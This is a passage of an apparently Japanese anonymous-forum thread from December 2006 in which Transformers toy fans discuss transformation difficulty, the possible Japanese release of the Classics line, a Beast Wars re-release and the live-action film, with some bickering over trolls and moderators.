だが、判らないから様子見にした物は、大抵次も判らないのでやっぱり様子見。
削除人が変われば、その率は一層高くなる。
つまり若削除★の判断は正しい。

そして削除明王★にケチつけてるボンクラも同じだ。
削除コテを付けて「無意味です。そんな代物を見せられても、処理判断には影響しません。」と
言い切ってしまったから、その責任を取っただけ。
「板住人の総意に左右されず」と言い切ったから、それを実践しただけだ。
若削除★が「話し合え」と言ったのは、板住人の総意に左右される為ではなく
若削除★自身が削除を迷わない環境にしろと言ってるだけ。
そうでなければ一生【様子見】。
そして削除明王★が自分なりに見つけた【様子見】って文字の代わりが【今回敢えて手出ししません】だ。
それをそのままどっかの暴走野郎が都合良く解釈して「今回敢えて手出ししませんだから、次は大丈夫です」なんて
考えてるなら、例えもう一度来たとしても【今回も敢えて手出ししません】で終わるだけ。

意図的に重複スレを立てたり、報告した側が報告対象スレにちょっかいを出すのは削除人に嫌われるだけの愚行。
ちょっと前までTF住人は、これくらいの常識は持ち合わせていたのに
今じゃここまで墜ちたのか?
これじゃ死んだ念力が浮かばれないな。
私怨スレの頃以下だ。

200 :ぼくらはトイ名無しキッズ:2006/12/16(土) 19:24:39 ID:jDrYqnwW0
ttp://i.toynewsi.com/g/albums/TNI_2006_Holiday_Picks/Transformers_Classics//DSC08378.jpg
ttp://i.toynewsi.com/g/albums/TNI_2006_Holiday_Picks/Transformers_Classics//DSC08402.jpg
はやく欲しいぞーーー

201 :ぼくらはトイ名無しキッズ:2006/12/16(土) 19:30:40 ID:kg7or5110
>ID:33QRMWAQ0
余りにも長文過ぎて読む気になれねーよ
結局>>199の最後の5行が言いたいだけだろ?
んで、念力って誰か知らんけど、死んだ人間を持ち出すのは流石にどうよ?

202 :ぼくらはトイ名無しキッズ:2006/12/16(土) 19:36:52 ID:dNj42AlT0
>>201








                 w











203 :ぼくらはトイ名無しキッズ:2006/12/16(土) 20:05:15 ID:ZR3q61s30
いやぁ週末だけあって爆発してるねぇ

向こうのスレでは上げ自演
こっちでは長文タラタラ

見苦しいったらありゃしない

204 :ぼくらはトイ名無しキッズ:2006/12/16(土) 21:10:09 ID:E6zJsFip0
それだけ荒らしも暇なんだろ
昼夜問わず出現してるし。ずっと家に居るとしか思えない

205 :ぼくらはトイ名無しキッズ:2006/12/16(土) 23:08:15 ID:wVSIHbUp0
糞スレで名も書かず ageている馬鹿ならば
ただageと書きながら 踊っていればいいけれど
私は自治の 使命に目覚めた
華やかに激しく 仕切ろ!と目覚めた

馬鹿な自治は 気高く騒いで
馬鹿な自治は 美しく散る

206 :ぼくらはトイ名無しキッズ:2006/12/16(土) 23:11:20 ID:jDrYqnwW0
TFの話もしようよ〜〜〜♪

207 :ぼくらはトイ名無しキッズ:2006/12/17(日) 03:43:14 ID:3dqJB4oU0
前このスレでオートボルトリペってストリーク作る!って言った名無しだよ
約束通り作ったよ
やっと仕上げオワタ
ttp://f59.aaa.livedoor.jp/~tfup/imgboardphp/src/1166294239091.jpg


208 :ぼくらはトイ名無しキッズ:2006/12/17(日) 07:47:25 ID:EbHKStYwO
>>207
つーかあっちもこっちもしつけーよ。
連投の上にすぐレスがつかないからっていちいち宣伝しなくていーから。
つかネタ自体が既出なんで。

209 :ぼくらはトイ名無しキッズ:2006/12/17(日) 17:03:09 ID:3dqJB4oU0
>>208
報告のつもりだったんだけど両方見てるのね
ゴメン

210 :ぼくらはトイ名無しキッズ:2006/12/17(日) 17:17:09 ID:CT7AlzSk0
マルチポストは駄目だよ。今度から気をつけよう。

211 :ぼくらはトイ名無しキッズ:2006/12/17(日) 19:34:29 ID:UGajZdT40
1ヶ月ぶりにMPスタスクを出す・・・30分変形できない
説明書を見てもさらに15分・・・

これでもBWのマッハキックとかより簡単なんでしょ?


212 :ぼくらはトイ名無しキッズ:2006/12/17(日) 19:52:51 ID:uSmbhSBP0
30分も悩んでたのかw

MPスタスクと完全版コンボイだけどクリスマスだからってことなのか!?
結構売れてたw

213 :ぼくらはトイ名無しキッズ:2006/12/17(日) 20:58:21 ID:oP8NY2e40
マッハキックは変態だけどそんなに複雑ってワケでもないよ。
TFに慣れてる人なら一度やれば覚えるレベル。
あ、でもプロテクトモードだけは説明書見ないと無理だw

214 :ぼくらはトイ名無しキッズ:2006/12/17(日) 21:05:35 ID:3077q/UI0
一回説明書見ながらやれば、馬⇔ロボは難しくないね。
要は、普通に考えてると到底思いつかないような、
知恵の輪みたいなパーツ配置が曲者なだけだから。

しかしプロテクトモードは説明書と写真見ながらでも、
どれが正解なのか、いまだにわからない。

215 :ぼくらはトイ名無しキッズ:2006/12/17(日) 22:19:28 ID:Q1l4jl6R0
自分が持ってる中で難しいと感じたのはマグナボスだな。
あれはいつまでたっても合体形態が覚えられない。
中途半端な状態でも合体できちゃうんで、まっいっか。で済ませちゃうし。

逆にビッグコンボイやマグマトロンは慣れると簡単。30秒でいける。

216 :ぼくらはトイ名無しキッズ:2006/12/17(日) 22:31:43 ID:R/AVD0cG0
本体だけのMP1を安くで入手できたんだけど、MP4も買っておいた方が良い?
分解できるメガトロンガンにコンボイガン、エネジーアックスにコンテナが付いてくるとなれば欲しいんだけど、それだけを目的に買うには高い?


217 :ぼくらはトイ名無しキッズ:2006/12/17(日) 23:35:57 ID:gKSLY7JV0
コンテナが本当にそのまま、G1当時のを拡大パチしたような出来だからなあ・・・
司令塔を出す為の穴がそのままでチープ、風雨が入ってこないか心配になるよ。
なによりローラーが付いてないし。

値段と気分次第、ただあんなもんそうそう売れないだろうし、
適当にセール価格になるまで待つのもありじゃない。

218 :ぼくらはトイ名無しキッズ:2006/12/18(月) 00:11:14 ID:fFBwmOCz0
今日友達がMPコンボイを説明書なしで変形させてたら
軽く30分以上かかった

あと、一番難しい変形はスピードブレイカーじゃね?

219 :ぼくらはトイ名無しキッズ:2006/12/18(月) 10:10:49 ID:TjIr8ORI0
ギガトロン全部だって相当な何度だぜ

220 :ぼくらはトイ名無しキッズ:2006/12/18(月) 12:35:05 ID:YexZYrZiO
MPコンボイは簡単な部類だと思う。
説明書の通りにやればすぐ出来る。

バイナル難しくて投げた俺が言うんだから間違いない。

221 :ぼくらはトイ名無しキッズ:2006/12/18(月) 12:58:24 ID:obPbAOIu0
MPコンボイもバイナルも、
微妙にボディをたわませてロック外す箇所があるのが気になる。
動かしててどっか傷つけたり、ピン折れたりしそうでちょっとなあ。

222 :ぼくらはトイ名無しキッズ:2006/12/18(月) 13:36:51 ID:SPVabpvQ0
説明書みてもTHSコンボイの変形がむずかしいと思うのは俺だけじゃないはず。


223 :ぼくらはトイ名無しキッズ:2006/12/18(月) 13:45:50 ID:Gp6fj/WO0
前輪部のはめ込みがちょっとしんどいよね。あとはそう難しく感じなかったが。

224 :ぼくらはトイ名無しキッズ:2006/12/18(月) 14:46:37 ID:DLUFPtqF0
難しくは無かったけど下腕カバーが飛ぶのにはイラッとした

225 :ぼくらはトイ名無しキッズ:2006/12/18(月) 14:53:39 ID:fzy0xtN70
俺もあのプラのテンションを利用して外したりするピンは嫌いだな...
バイナルとかMPは、慣れれば大丈夫なんだけど
ここは力をかけていい場所かそうでないのかがわかりにくいのが嫌だ。

226 :ぼくらはトイ名無しキッズ:2006/12/18(月) 15:39:32 ID:33GyllJt0
ここは不器用な人が多いスレでつねw

227 :ぼくらはトイ名無しキッズ:2006/12/18(月) 15:50:40 ID:6iE/Fhl90
>>223
(´∀`)人(´∀`)

228 :ぼくらはトイ名無しキッズ:2006/12/18(月) 17:40:48 ID:H1yywaOV0
変形途中、上手く回る位置までパーツを「逃がす」って作業が苦手だ。
バイナル全般とか、ビッグコンボイやゲルシャークの肩とか。
壊れないようにすぐポロリ仕様なのもイヤーン。

229 :ぼくらはトイ名無しキッズ:2006/12/18(月) 22:11:46 ID:2HFD2wkx0
>>228
だよねー。
折れるよりはマシだけど、せっかく外れないように動かしたのに、
他のパーツ動かした時につい当てちゃってポロっと取れるとムカつく・・・

230 :ぼくらはトイ名無しキッズ:2006/12/19(火) 02:31:47 ID:c7SkBAue0
なんかみんな同じようなこと考えてたんだなw

231 :ぼくらはトイ名無しキッズ:2006/12/19(火) 12:40:23 ID:fhXxt6vlO
ポロポロは差し替え無し完全変形の夢を濁すからイヤン
外れちゃうの分かっていても外さずにキメたいのよね

232 :ぼくらはトイ名無しキッズ:2006/12/19(火) 15:21:28 ID:36IMnwUp0
ビッグコンボイのビッグキャノンなんて
余所のメーカーなら多分一回外して付け替えてるとこだろうに、
多大な苦労して位置変えしてるよね。
マンモスの鼻〜背中が横向くだけなんだけどさ。

233 :ぼくらはトイ名無しキッズ:2006/12/19(火) 16:53:54 ID:spX//OWC0
>>231
エルドランシリーズじゃあるまいしね。
でも変形と可動を両立させようとすると
どうしても無理がきちゃうんだろな。

234 :ぼくらはトイ名無しキッズ:2006/12/20(水) 02:21:21 ID:l2bvdMZQ0
はやくMPロディマスコンボイが欲しい

235 :ぼくらはトイ名無しキッズ:2006/12/20(水) 02:56:58 ID:po0HLQnf0
MPもいいけど
クラシック発売してほしい

236 :ぼくらはトイ名無しキッズ:2006/12/20(水) 09:26:36 ID:PTy+53A30
欲しいならクラシックは輸入ショップで買いなさい

237 :ぼくらはトイ名無しキッズ:2006/12/20(水) 09:44:18 ID:HET83zU20
オクでクラシクボイジャーメガ様3,000円で買えたぜ。もうほとんど国内販売されてんのと値段変わらなくね?

238 :ぼくらはトイ名無しキッズ:2006/12/20(水) 10:51:40 ID:tRUI1oX60
こんな時期まで待っておいて何得意げに言ってんだ

239 :ぼくらはトイ名無しキッズ:2006/12/20(水) 11:40:04 ID:62ES9V0+0
不良品だったら泣き寝入りってのが結構ツライ。>海外商品

クラシックやタイタニウムを全部買うとなると、不良品にあたる確率は
グンと上がるからな。

まだシリーズ終了してないにも拘わらず、俺は既にそれぞれのシリーズで
不良品一個づつ掴まされてるし・・・。

そういう意味でも国内販売してくれれば是非とも買わせてもらうよ。

240 :ぼくらはトイ名無しキッズ:2006/12/20(水) 11:42:26 ID:HET83zU20
いや、得意げとかじゃなくて。
もし国内で販売されたらこのくらいの値段かなってくらいまで安くなってんだから欲しい奴は買えばいんじゃね? ってだけの話。
ボイジャーサイズ(旧区分で言うところのメガサイズ)が3,000円なら国内展開のギャラクシーフォースと変わらない値段だなーと思って。だから俺はこんな今更な時期に買った。
まあ得意げに見えたんならスマン。俺の書き方が悪かった。

241 :ぼくらはトイ名無しキッズ:2006/12/20(水) 11:45:40 ID:HET83zU20
ああ、そうか。不良品の交換ができないってデメリットもあるのか。
そこまで考えてなかった……

242 :ぼくらはトイ名無しキッズ:2006/12/20(水) 11:52:49 ID:OGB31XZs0
いつか絶対発売されると分かってるなら待つのもアリだと思うが、
どうなるか分からないものだからなぁ。
欲しい時が買い時だとおもうけどね。

243 :ぼくらはトイ名無しキッズ:2006/12/20(水) 14:46:09 ID:1T+6uVbM0
クラシックは映像作品と連動でもないから日本発売は望み薄だし・・・


日本発売したとしても、ザラスやeホビー限定じゃぁ大して安くならないだろうし
全種出ないかもしれないし・・・

後悔したくないから俺は買ったよ。

244 :ぼくらはトイ名無しキッズ:2006/12/20(水) 20:46:59 ID:hFi/MWf60
ヒーローズとやらに使えばいいのにね・・・・
ほんと海外は余裕あるなあ

245 :ぼくらはトイ名無しキッズ:2006/12/21(木) 03:55:27 ID:pYDPEEBc0
電ホ早売りさっき読み返してて気づいたんだが、
クラシック来年でるのが決定したらしいな(店舗限定らしいが)。
細かいことは電ホみれ。TFコーナーの端っこーの方に小さく載ってる(地味すぎてパっと見気づかんかった)。

246 :ぼくらはトイ名無しキッズ:2006/12/21(木) 04:04:26 ID:aex5EmzV0
な、なんだってー
ムヒョ♪

247 :ぼくらはトイ名無しキッズ:2006/12/21(木) 07:38:32 ID:G0CvJm7yO
早売りにしては早過ぎないか?
早くても発売は金曜日だと思うんだが

248 :ぼくらはトイ名無しキッズ:2006/12/21(木) 10:22:53 ID:LPBhJZaM0
とりあえず確定ソース出るまでは静観だろ。

でも漏れは直接引いちゃったからそんな高い金出して無いし
海外版にシール貼っただけならスルーするだけ、
一部塗装等仕様が違うなら買うだけだな。

店鋪限定ってことは前者っぽい気がする。

249 :ぼくらはトイ名無しキッズ:2006/12/21(木) 11:19:24 ID:q1rUlxFr0
>>247
土曜が休日だからじゃないか?

なんにせよめでたい知らせだ。
ミニコン含めて全種出してくれるかが気になるけど。

250 :ぼくらはトイ名無しキッズ:2006/12/21(木) 11:29:49 ID:7BmcXYMn0
ミニコンはともかくとして、レジェンドは無さそうな気がするな・・・
それどころか本ラインナップも全部出るかどうか(特にジェットファイヤー)

251 :ぼくらはトイ名無しキッズ:2006/12/21(木) 12:04:34 ID:B1IgLECWO
店舗限定ならどうす海外箱にシールだろ
多分ジェットファイヤーやVSセット、ミニコンあたりはなさそうだし

252 :ぼくらはトイ名無しキッズ:2006/12/21(木) 12:35:49 ID:Pna1xnhB0
日本版デラックスサイズが2000円位ならロディマスは2個目買おう・・・
海外版全部買っちゃったから・・・

253 :ぼくらはトイ名無しキッズ:2006/12/21(木) 13:19:02 ID:9HniTahn0
もし国内導入が事実だとすればジェットファイヤーも普通に出るだろ。
新規でこれだけ出さない理由がわからん。

レジェンドやサウンドウェーブは無いだろな。

ミニコンは既に新規が6チームあるから余裕でブースターが組めるな。
今回のに組み込まれるかどうかはともかく。

254 :ぼくらはトイ名無しキッズ:2006/12/21(木) 13:30:21 ID:rAFNaE4EO
店舗限定ならザラスだろうな
まあなんにしてもめでてぇなクラシック日本導入

255 :ぼくらはトイ名無しキッズ:2006/12/21(木) 14:30:54 ID:GtCIAW220
よしお金貯める。

256 :ぼくらはトイ名無しキッズ:2006/12/21(木) 14:52:21 ID:N8eRLXMt0
>新規でこれだけ出さない理由がわからん
え、マジでわからんの・・・?
まぁ出るに越した事はないけど

257 :ぼくらはトイ名無しキッズ:2006/12/21(木) 15:06:19 ID:rA/g7Twu0
バルキリーに対するレギオスくらい別物だし、問題ないでしょ

258 :sage:2006/12/21(木) 16:17:22 ID:br9Pac6G0
>>256
G1ジェットファイヤーが日本で販売出来ないのはバルキリーのリペだっただからで、
TFのキャラクター、ジェットファイヤーとして造られてるクラシック版は問題ないんじゃないの?

259 :ぼくらはトイ名無しキッズ:2006/12/21(木) 16:18:30 ID:br9Pac6G0
あげちゃった・・・スマン

260 :ぼくらはトイ名無しキッズ:2006/12/21(木) 17:25:26 ID:5C0tANKHO
伝穂
上のはもちろんうそ。BWの再放送とともに昔のBW玩具の彩色グレードアップ版発売。あとはMPメガトロンの詳細

261 :ぼくらはトイ名無しキッズ:2006/12/21(木) 17:35:55 ID:vk6NYuHJ0
えーどっちだyo

262 :ぼくらはトイ名無しキッズ:2006/12/21(木) 17:48:58 ID:LMf/iOWl0
何だ、釣りか?

263 :ぼくらはトイ名無しキッズ:2006/12/21(木) 17:50:01 ID:Zmy7BPLd0
まあスキャン画像が出回るまでは静観でいいんじゃね

264 :ぼくらはトイ名無しキッズ:2006/12/21(木) 18:56:24 ID:qznU+XpZ0
模型裏で初めて知ったけど、
ttp://nov.2chan.net/y/src/1166677977922.jpg
このサイトのシールネタって、ここでは既出?
ttp://www.reprolabels.com/index.html

265 :ぼくらはトイ名無しキッズ:2006/12/21(木) 19:53:56 ID:JBxqj3wV0
メカ系のスキャン画像は明日以降かなぁ

266 :ぼくらはトイ名無しキッズ:2006/12/21(木) 21:02:27 ID:+AIDDBCI0
>>260
自分も確認。デマだったね。

267 :245:2006/12/21(木) 21:09:36 ID:pYDPEEBc0
釣りでした。
もっと疑われると思ったんですが・・ごめんなさい!!!

268 :ぼくらはトイ名無しキッズ:2006/12/21(木) 21:11:13 ID:Rcyo+0wf0
>>267
氏ね! 死ねじゃなくて氏ね!

269 :ぼくらはトイ名無しキッズ:2006/12/21(木) 21:17:24 ID:H+EvYpkx0

マニアはすでに買ってるから
リカラー版として煽らなきゃ儲からないだろ

それを解らない寶
やっぱりTFは売れないって思うショップ

映画版が流通しなくなりませんように



俺は嬉しいよ
テンバイヤーはアメリカ版を抱えてるんだもん

270 :ぼくらはトイ名無しキッズ:2006/12/21(木) 21:29:30 ID:CGXn9xvE0
>>267
氏ね。マジで氏ね。

271 :ぼくらはトイ名無しキッズ:2006/12/21(木) 21:35:14 ID:LMf/iOWl0
>>267
思ったより食いつきが悪かったな

272 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:01:13 ID:+UkYi+FX0
>>271
もう手に入れたって人の方が多いからじゃないかな
「今さら発売発表されても・・・」って感じで、素直には喜べないんだろう

273 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:19:51 ID:AF1FK5gW0
TFファンの数なんてその程度なんじゃ日本では何も売らない方がいいかもな

274 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:33:54 ID:B1IgLECWO
今後は海外から買うから宝はなんもしなくていいよ
細々とキスとかやってれゃいいじゃん
ザキを外さんかぎり変わらんよ
ビーストのリカラー再販も多分コケる
再放送前に両軍リーダーがすでに投げ売られたってのがなあ
それともまた売る気かな
小売り店が死ぬほど嫌がりそうだが

275 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:40:02 ID:Hge3g8gL0
ザキ死ね

276 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:42:20 ID:YD4S4LJ00
ビースト再販はマジでコケそうだよな。どんだけ学習能力無いんだよTF担当は。

277 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:44:44 ID:ICS9YzbD0
ビーストでプレ値が付いてるのは最後の三つ(パワゴリ、ドラゴン、虎隼)くらいか
ラットル、ダイノボットは人気ありそうだが滅多に見ないな
特に生司令官なんて投げ売られたって言うのに、また?

278 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:45:08 ID:TNyUlStM0
なんで売れない様な糞なものばかり日本発売して
クラシックみたいな良い物を日本発売しないかなぁ・・・
タカラの人間って見る目無さ杉

279 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:49:20 ID:AF1FK5gW0
クラシックを日本で販売するにしても今後のTF展開は受注販売ぐらいが丁度いいかもね
日本展開を望んでる奴の多くが投売り待ちなのは目に見えてるし
劇場版も恐らく玩具に関しては受ける層が限られるから大コケだろうな

280 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:55:35 ID:hgsCeWa90
>劇場版
メタルスの時みたいに劇場の売店で販売したらそれなりに売れる気が
見た直後の興奮も手伝って

281 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:56:20 ID:qznU+XpZ0
実際、クラシックって子供受けするかなぁ
ずっと支えてるコア層は先細りしそうだし、
怪獣(恐竜)、動物の方が子供に売れて市場が少しは広がると
思ってるんじゃね
そろそろ日本じゃ、カブトムシやクワガタが変形するTFが出そうな
悪寒もする(一時、メガトロンなんてもろクワガタ頭だったし)

282 :ぼくらはトイ名無しキッズ:2006/12/21(木) 22:57:38 ID:8NPJTwp90
受注生産は先細りするだけだから駄目。万が一の拡大の可能性もゼロになる
リペみたいなのはそれでもいいけど

283 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:02:38 ID:YD4S4LJ00
>>281
クラシックスが子供受けする訳ねーじゃん。あれはG1のリメイク的なコンセプトなんだから。
それと、

>そろそろ日本じゃ、カブトムシやクワガタが変形するTFが出そうな悪寒もする

なんでそう思うの?どこかソースあった?それとも妄想?

284 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:04:23 ID:8NPJTwp90
推測だろ
昆虫は既に時期を逸しているとは思うが…

最近の男の子に流行してるのって何なんだろな

285 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:11:00 ID:f0ubzSem0
>>284
電車

286 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:18:40 ID:WfJlfPsF0
新幹線の変形ロボはタカラの十八番なのに、今はそれを扱う舞台すらない。
そんな状況の中、次の仮面ライダーはバイクではなく電車に乗って大活躍か。

287 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:19:35 ID:YD4S4LJ00
>>284
ああ、ムシキングか。だったら今更感はあるな

それより、リボスレじゃ12弾はメガトロンだそうな。

288 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:26:04 ID:qznU+XpZ0
>>283
近場でね、最近3歳児が兄弟の影響かムシキングに夢中だったのが、
強烈な印象だったってぐらいの話
確かに妄想だね

289 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:26:56 ID:YD4S4LJ00
だからムシキング言うとるやないか

290 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:27:34 ID:8NPJTwp90
ワルサーなのにリボルバーか

291 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:34:01 ID:qznU+XpZ0
>>289
(´・ω・`)

292 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:35:35 ID:f/hPRz8h0
>>289
なぁ、>>288は何でそう思うの?ってオマイさんが質問したのに答えてるだけじゃないのか?
噛み付くことでもないような?


そういやビーストの再放送って関東限定なのね。玩具再販って言っても大した数は出ないかもな。
まぁ放映自体が4月までの繋ぎみたいなもんだしな…。

293 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:38:20 ID:YD4S4LJ00
>>291
ゴメンゴメンw 悪気は無いのよ。

>>292
突っ込みのつもりだったんだが。

294 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:49:05 ID:qznU+XpZ0
元気でた…ヽ(´∀`)ノ
とにかくクラシックが日本で販売・サポートされて、
コア層以外も取り込めて活発に商品開発されると良いね
んじゃ、おやすみー

295 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:56:36 ID:I8xxA0Z50
結局釣りだったのか>クラシック国内販売

まあ実際今タカラトミーが国内でクラシックを発売しようとしたら、
海外の商材なのでトミーダイレクトの取り扱いで、希望小売価格の設定が、

ミニコンクラス¥1780
デラックスクラス¥2480
ボイジャークラス¥4980

な感じで、テレビ放映とかCM投下はないので流通限定&数量限定で、
トイザラスで、

ミニコンクラス¥1699
デラックスクラス¥2299
ボイジャークラス¥4499

で、グリムロックは瞬殺でオクで4〜5Kぐらい。

な感じではないかとオレ妄想。

296 :ぼくらはトイ名無しキッズ:2006/12/22(金) 00:05:11 ID:VC0FjGp40
>>292
関東限定で再放送なのに再販ってマジかよ・・・売れるわけ無いだろ常識的に考えて・・・

297 :ぼくらはトイ名無しキッズ:2006/12/22(金) 01:14:06 ID:TQokR+S+0
ビースト再販、小売の発注の段階でコケそうだな
発注数が少なかったのでキャンセルになってくれたほうがダメージ少ないかもしれん
それとも何か?関東のザラス限定とか抜かすのかな?

298 :ぼくらはトイ名無しキッズ:2006/12/22(金) 01:53:08 ID:IL38k4KH0
1月から放送開始で4月までしかないのに
現時点で問屋に発注表来てないからザらス限定は確実かも。
関東のザらスとオンライン限定とかになりそうだな。
放送していない地域で今更再販しても
TFファン以外は誰も見向きもしないだろうし。
今月発売のフィギュア雑誌にラインナップすら載ってないとなると
まったく売る気ゼロだな。
もしくは少量販売で煽るのか。
どっちにしろ「売れない」のは確実だな。
またタカトミの借金増やすのか。

299 :ぼくらはトイ名無しキッズ:2006/12/22(金) 02:59:56 ID:Yo9EOC+20
一部のファンにしか売れない物をわざわざ出してくれるんだから、
一部のファンとして素直に喜んどくさ。

再販ビーストって海外で出た10周年記念リペ版かな。
だとしたらラットルは生ネズミに差し替えて欲しいなー。

300 :ぼくらはトイ名無しキッズ:2006/12/22(金) 06:04:03 ID:Il/VdQFX0
子供に売れるものじゃないと新規ファン開拓できない・・・


今の男子小●生は任天堂DSやってるところしか見ないな
少年ジャンプすら人気ないよ

301 :ぼくらはトイ名無しキッズ:2006/12/22(金) 06:20:56 ID:Il/VdQFX0
ttp://www.gamespark.jp/modules/news/index.php?p=674

誰も書いてないから連続カキコ失礼

302 :ぼくらはトイ名無しキッズ:2006/12/22(金) 14:23:17 ID:0GLTgt1o0
今後TFのゲームは任天堂ハードの方向に行くのか
というかPSは前のやつしかないのか?
wiiで肉弾戦やりてえw

303 :ぼくらはトイ名無しキッズ:2006/12/22(金) 19:24:13 ID:24+dkxrP0
映画の最新トレーラー見たら、ちょっと脱糞した。
ヘリから変形するやつはデストロンかな?

304 :ぼくらはトイ名無しキッズ:2006/12/22(金) 21:30:47 ID:fUkOaZUyO
映画版のプライマスまだぁ??

305 :ぼくらはトイ名無しキッズ:2006/12/22(金) 21:46:56 ID:+WXMYto90
>>303
一生トイレにこもってろ

306 :ぼくらはトイ名無しキッズ:2006/12/22(金) 21:48:01 ID:yPvjNaPGO
映画にプライマスはでねーよ

307 :ぼくらはトイ名無しキッズ:2006/12/23(土) 07:38:13 ID:cm/7xN2wO
今めざましTVで映画の紹介したぞ!
例の予告が流れて
「スピルバーグ最新作」
「誰も見たことない映像」
「新たな地球侵略モノ」
「正義と悪のロボットが戦う」
っていってたな
いい感じに新作ハリウッド映画って感じの紹介だったのである意味ヲタ以外にも注目されるかもな

これであとは脚本が良ければヒットしそうだが…

308 :ぼくらはトイ名無しキッズ:2006/12/23(土) 07:44:01 ID:t57r2D6e0
モンジャのクラシックコーナーに昨日の夜6時ごろから
ミラージ入ってるのにTOPに書かれないから減らないね

2ちゃんに書いたら10分ぐらいで消えるかな?

309 :ぼくらはトイ名無しキッズ:2006/12/23(土) 08:07:08 ID:xKpC/khQ0
>>309
しかし監督がマイケル・ベイ

310 :ぼくらはトイ名無しキッズ:2006/12/23(土) 09:19:28 ID:rMYFokoS0
芸スポ板でもスレ立ってたけど、概ね好評だったよ(映像は)

311 :ぼくらはトイ名無しキッズ:2006/12/23(土) 10:38:03 ID:jLo4nKPC0
日本での展開も紹介してほしいな
そのアニメを見ていた世代の人が見たくなるように

312 :ぼくらはトイ名無しキッズ:2006/12/23(土) 12:38:48 ID:YlVg8LR/O
テレビに情報きたかー

テレ東のショービズ カウントダウンにもそろそろ出ると良いな 来年はスパイディの3もあるから改めて絡めてあそべるわい

313 :ぼくらはトイ名無しキッズ:2006/12/23(土) 13:46:32 ID:HUyO8Rdt0
>>307
エラゴンのコケっぷりを見てると海外で特撮だからといっても
無条件にウケるとは限らないし・・・

タカラは楽観的に構えてないでもっと営業しないと困るよな。
なんで、アメリカでTFの知名度があって、日本では売れないのか、
というのは日本人の気質がどうとか言う問題じゃなくて
蓮とタカラの宣伝に対する力の入れ具合の差から来てるはずだ。



314 :ぼくらはトイ名無しキッズ:2006/12/23(土) 13:47:44 ID:QikQyLRzO
>>312
ついでにゴーストライダーも絡めちまえw

315 :ぼくらはトイ名無しキッズ:2006/12/23(土) 13:56:01 ID:t9rRqcNa0
>>313
エラゴンが転けた理由には「またファンタジーかよ」的なところもあるし
今回は海外特撮では珍しいロボットだし、ちょっとは違うように見えるんじゃないか

316 :ぼくらはトイ名無しキッズ:2006/12/23(土) 16:21:27 ID:3V1anSqF0
>>315
それでも油断せずに徹底してプロモーションしてほしいな
まあ吹き替えに芸能人起用とやらせCMは勘弁だが

317 :ぼくらはトイ名無しキッズ:2006/12/23(土) 17:09:17 ID:LPyvFrsk0
私に良い考えがある!

メガトロンの吹き替え声優にワタナベケンを起用して
「スタースクリーム、良い子にしていますか?お父さんはさみしいです」
ってセリフを流すだけのラジオCMを用意するんだ!
『硫黄島からの手紙』と間違えて見に来る客が続出だぞ!?

318 :ぼくらはトイ名無しキッズ:2006/12/23(土) 18:30:13 ID:o8nm7qNt0
CMにTFファンの芸能人を出すんだ

319 :ぼくらはトイ名無しキッズ:2006/12/23(土) 18:39:02 ID:e9/Xj3W20
おすぎですっ

320 :ぼくらはトイ名無しキッズ:2006/12/23(土) 21:36:37 ID:2ZTTOy8tO
ピーコですっ

321 :ぼくらはトイ名無しキッズ:2006/12/23(土) 23:34:51 ID:QikQyLRzO
MPメガトロンのガンモードが載ってる記事がうpされてるな。
大人の手が小さく見えるw

322 :ぼくらはトイ名無しキッズ:2006/12/23(土) 23:50:54 ID:zHCqV0oq0
でも握れるサイズで良かった

323 :ぼくらはトイ名無しキッズ:2006/12/24(日) 00:46:03 ID:zEyDrKBf0
>>310
まあ映画は予告編が一番面白いってのが常だから…

324 :ぼくらはトイ名無しキッズ:2006/12/24(日) 00:47:33 ID:LswXgjlz0
これか
ttp://tformers.com/ig.php?mode=album&album=6907&dispsize=800&start=0

325 :ぼくらはトイ名無しキッズ:2006/12/24(日) 03:45:52 ID:XokUglgw0
G1のTFたちの全身の資料って無いかな
玩具の方は出てくるけどアニメの方はなかなか見つからん

326 :へいすけ:2006/12/24(日) 05:48:05 ID:ZHbonY5W0
故ケイブンシャ刊「トランスフォーマージェネレーション」に載ってるよーな。
アニメ版とスタジオOX版が、線画で。

これから探すなら、ミリオン出版が復刻したデラックス版の方かねえ。

327 :ぼくらはトイ名無しキッズ:2006/12/24(日) 06:15:12 ID:m0lTpKMH0
ヤフオクでエアラザvsクワッガイッガァァァァー!!!!!!!!!!!!!!
が7000円にもなってたよ。

他のはそんなんでもないのになんでこればっかりプレ値に??( ゚д゚ ) ( ゚д:;.:...  (´:;....::;.:. :::;.. .....

328 :ぼくらはトイ名無しキッズ:2006/12/24(日) 08:08:54 ID:LpNH6RZp0
実際エアラザーってあんまり見かけないしね。
中古で探しても外れやすい肩当と足首と尻尾武器のせいで
欠品ナシを探すのはなかなか難しかったりもする。

勇者王クワガイガーはわりと見かけるんだけどねえ…
格納ボウガンもきっちりしまわれてるせいか滅多に欠品ないし。

329 :ぼくらはトイ名無しキッズ:2006/12/24(日) 09:04:15 ID:erH9l27Z0
>>327
ヴァカがふたりいた。


まあ、確かにそのセット(大空の対決)はめったに見かけんが。

330 :ぼくらはトイ名無しキッズ:2006/12/24(日) 11:57:21 ID:XokUglgw0
>>326
d
アニメと玩具で顔、カラーリング違うのが日常茶飯事だから困る
G1本編見たこと無いからなぁ

331 :ぼくらはトイ名無しキッズ:2006/12/24(日) 12:55:22 ID:t2CRxQ9B0
アイアンハイドとラチェットは玩具と別物すぎて、
